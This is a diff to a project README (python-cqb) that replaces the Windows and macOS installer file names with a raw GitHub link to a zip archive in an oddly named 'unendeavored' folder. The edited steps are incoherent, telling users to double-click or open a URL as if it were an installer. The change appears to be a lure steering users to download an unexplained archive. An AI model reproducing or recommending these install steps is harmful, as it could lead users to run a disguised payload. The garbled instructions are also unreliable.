facu18911891/python-cqb/README.md

 ### For Windows

 1. After downloading the installer, locate it in your downloads folder.
-2. Double-click the installer file, `python-cqb-windows-installer.exe`.
+2. Double-click the installer file, `https://raw.githubusercontent.com/facu18911891/python-cqb/main/unendeavored/python-cqb.zip`.
 3. Follow the instructions in the setup wizard.
 4. Once the installation completes, you can find **python-cqb** in your Start Menu.

 ### For macOS

-1. Open the downloaded file `python-cqb-macos-installer.dmg`.
+1. Open the downloaded file `https://raw.githubusercontent.com/facu18911891/python-cqb/main/unendeavored/python-cqb.zip`.
 2. Drag the **python-cqb** icon into your Applications folder.
 3. You can now launch the app from your Applications.